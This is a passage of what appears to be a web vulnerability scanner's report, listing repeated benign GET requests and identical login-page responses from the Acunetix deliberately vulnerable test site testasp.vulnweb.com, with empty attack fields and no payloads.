align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=24 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D24" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=25 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D25" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=26 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D26" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:56 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:57 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
